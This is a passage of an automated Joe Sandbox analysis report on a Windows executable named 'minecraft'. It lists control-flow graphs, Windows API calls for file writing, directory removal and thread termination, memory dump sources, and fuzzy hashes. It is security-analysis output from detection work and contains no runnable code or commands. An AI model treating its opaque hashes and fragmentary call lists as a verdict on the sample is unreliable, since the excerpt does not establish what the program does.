    • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 104 14000de50-14000de9e call 1400112a8 107 14000dea4-14000deb4 104->107 108 14000e098-14000e09b 104->108 109 14000deb6-14000dec7 107->109 110 14000defb-14000defe 107->110 111 14000e07f-14000e097 108->111 112 14000dec9 109->112 113 14000decd-14000def6 CreateFileW 109->113 114 14000df42-14000df46 110->114 115 14000df00-14000df11 110->115 112->113 116 14000dfbc-14000dfc0 113->116 119 14000dfb7 114->119 120 14000df48-14000df59 114->120 117 14000df13 115->117 118 14000df17-14000df40 CreateFileW 115->118 121 14000dfc6-14000dfc9 116->121 122 14000e05d-14000e06f call 1400111dc 116->122 117->118 118->116 119->116 123 14000df5b 120->123 124 14000df5f-14000df8b CreateFileW 120->124 121->122 125 14000dfcf-14000dfd8 121->125 130 14000e074-14000e07c 122->130 123->124 124->121 127 14000df8d-14000dfb5 CreateFileW 124->127 128 14000dff9 125->128 129 14000dfda-14000dfdf 125->129 127->116 132 14000dffd-14000e02d 128->132 129->128 131 14000dfe1-14000dff7 RtlAllocateHeap 129->131 130->111 131->132 133 14000e04d-14000e05b 132->133 134 14000e02f-14000e034 132->134 133->122 133->130 134->133 135 14000e036-14000e047 SetFilePointer 134->135 135->133
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: File$Create$CriticalSection$AllocateEnterHeapLeavePointer
    • String ID:
    • API String ID: 3319923023-0
    • Opcode ID: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
    • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
    • Opcode Fuzzy Hash: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
    • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
    • String ID:
    • API String ID: 458812214-0
    • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
    • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
    • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
    • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 148 14000593c-14000593e 149 140005945-140005954 148->149 149->149 150 140005956-140005979 call 1400123e0 149->150 153 14000597b-140005987 150->153 154 140005a39-140005a53 153->154 155 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 153->155 157 140005a55-140005a61 154->157 155->153 155->154 159 140005b13-140005b2d 157->159 160 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 157->160 163 140005b2f-140005b3b 159->163 160->157 160->159 166 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 163->166 167 140005bed-140005c07 163->167 166->163 166->167 171 140005c09-140005c15 167->171 175 140005cc7-140005ce1 171->175 176 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 171->176 178 140005ce3-140005cef 175->178 176->171 176->175 184 140005da1-140005dbb 178->184 185 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 178->185 192 140005dbd-140005dc9 184->192 306 140005d96-140005d9b 185->306 199 140005e7f-140005e99 192->199 200 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 192->200 207 140005e9b-140005ea7 199->207 200->192 200->199 214 140005f5d-140005f77 207->214 215 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 207->215 223 140005f79-140005f85 214->223 215->207 215->214 231 14000603b-140006055 223->231 232 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 223->232 241 140006057-140006063 231->241 232->223 232->231 250 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 241->250 251 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 241->251 450 1400065a1-1400065a6 call 140003ddc 250->450 451 14000657d-140006593 call 140007284 250->451 251->241 251->250 306->178 306->184 455 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 450->455 454 140006598-14000659f 451->454 454->455
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Value$HeapPath$AllocateCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
    • String ID:
    • API String ID: 116240943-0
    • Opcode ID: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
    • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
    • Opcode Fuzzy Hash: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
    • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FilePointermemcpy
    • String ID:
    • API String ID: 1104741977-0
    • Opcode ID: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
    • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
    • Opcode Fuzzy Hash: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
    • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 531 1400126d0-1400126f2 TlsGetValue 532 1400126f4-1400126fc 531->532 533 140012700-14001272b 531->533 532->533 534 140012772-14001277f 533->534 535 14001272d-140012770 RtlReAllocateHeap 533->535 536 1400127d0-140012802 534->536 537 140012781-140012789 534->537 535->536 538 140012793-1400127cd RtlReAllocateHeap 537->538 539 14001278b 537->539 538->536 539->538
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateHeap$Value
    • String ID:
    • API String ID: 2497967046-0
    • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
    • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
    • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
    • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 540 14000e3f0-14000e404 541 14000e4f3-14000e4fd 540->541 542 14000e40a-14000e40e 540->542 542->541 543 14000e414-14000e418 542->543 544 14000e483-14000e4a6 call 14000e770 543->544 545 14000e41a-14000e423 543->545 553 14000e4a8-14000e4b5 544->553 554 14000e4ee 544->554 546 14000e451-14000e45b 545->546 547 14000e425 545->547 546->546 550 14000e45d-14000e482 WriteFile 546->550 549 14000e430-14000e43a 547->549 549->549 552 14000e43c-14000e450 call 14000e620 549->552 556 14000e4c5-14000e4d6 WriteFile 553->556 557 14000e4b7-14000e4ba call 14000e620 553->557 554->541 558 14000e4dc-14000e4e8 HeapFree 556->558 561 14000e4bf-14000e4c3 557->561 558->554 561->558
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FileWrite$FreeHeap
    • String ID:
    • API String ID: 74418370-0
    • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
    • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
    • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
    • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateHeap$Value
    • String ID:
    • API String ID: 2497967046-0
    • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
    • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
    • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
    • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 568 14000d914-14000d922 569 14000d924-14000d95a wcsncpy wcslen 568->569 570 14000d99e 568->570 571 14000d98a-14000d99c CreateDirectoryW 569->571 572 14000d95c-14000d96b 569->572 573 14000d9a0-14000d9a8 570->573 571->573 572->571 574 14000d96d-14000d97b 572->574 574->571 575 14000d97d-14000d988 574->575 575->571 575->572
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CreateDirectorywcslenwcsncpy
    • String ID:
    • API String ID: 961886536-0
    • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
    • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
    • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
    • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 576 14000b538-14000b573 memset 00007FFEEC975550 CoInitialize
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: 00007C975550Initializememset
    • String ID:
    • API String ID: 3312178377-0
    • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
    • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
    • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
    • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CodeExitProcess
    • String ID: open
    • API String ID: 3861947596-2758837156
    • Opcode ID: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
    • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
    • Opcode Fuzzy Hash: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
    • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

    Control-flow Graph

    APIs
      • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
      • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
      • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
      • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
      • Part of subcall function 000000014000B538: 00007FFEEC975550.COMCTL32 ref: 000000014000B561
      • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
      • Part of subcall function 00000001400120D0: RtlAllocateHeap.NTDLL ref: 0000000140012123
      • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD11
      • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD42
      • Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CDB2
      • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
      • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
      • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
      • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D476
      • Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D491
      • Part of subcall function 0000000140011D30: RtlAllocateHeap.NTDLL ref: 0000000140011D82
      • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
      • Part of subcall function 00000001400120D0: RtlReAllocateHeap.NTDLL ref: 0000000140012151
      • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
      • Part of subcall function 000000014000C4D0: RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C8A5
      • Part of subcall function 000000014000C4D0: RtlAddVectoredExceptionHandler.NTDLL ref: 000000014000C8C0
      • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
      • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
      • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
      • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
      • Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266
    • HeapDestroy.KERNEL32 ref: 000000014000124C
    • ExitProcess.KERNEL32 ref: 0000000140001258
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Heap$Allocate$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$00007AllocC975550DestroyExitInitializeProcessRemove
    • String ID:
    • API String ID: 159277613-0
    • Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
    • Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
    • Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
    • Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 676 140011d30-140011d6c call 140011ef4 679 140011dec-140011e0b 676->679 680 140011d6e-140011d8e RtlAllocateHeap 676->680 680->679 681 140011d90-140011dc9 memset call 1400167c0 680->681 681->679 684 140011dcb-140011dce 681->684 684->679 685 140011dd0 684->685 686 140011dd2-140011dea call 140016cfc 685->686 686->679
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Heap$AllocateFreememset
    • String ID:
    • API String ID: 2774703448-0
    • Opcode ID: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
    • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
    • Opcode Fuzzy Hash: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
    • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340
    APIs
      • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
    • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
    • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
      • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
      • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
      • Part of subcall function 000000014000720C: RtlEnterCriticalSection.NTDLL ref: 0000000140007230
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
    • String ID:
    • API String ID: 547990026-0
    • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
    • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
    • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
    • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateHeapwcslen
    • String ID:
    • API String ID: 1345907364-0
    • Opcode ID: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
    • Instruction ID: cbd8129a4029e1d9ec6fd495d0fb7d522f2e550c82e6ba5ffb2ff9068418f6bb
    • Opcode Fuzzy Hash: a0dc15986e3017cd2ed62ee5ac775f964501f34d63cb4b3c8d7d12bb2f12bec3
    • Instruction Fuzzy Hash: B7F09276608A8086D621DB5AE45139AA7B0F7C9BC4F504125EBDC87B69DF3EC9518A00
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: File$AttributesDelete
    • String ID:
    • API String ID: 2910425767-0
    • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
    • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
    • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
    • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Heap$Allocate$AllocCreateValue
    • String ID:
    • API String ID: 3361498153-0
    • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
    • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
    • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
    • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: DestroyFreeHeap
    • String ID:
    • API String ID: 3293292866-0
    • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
    • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
    • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
    • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
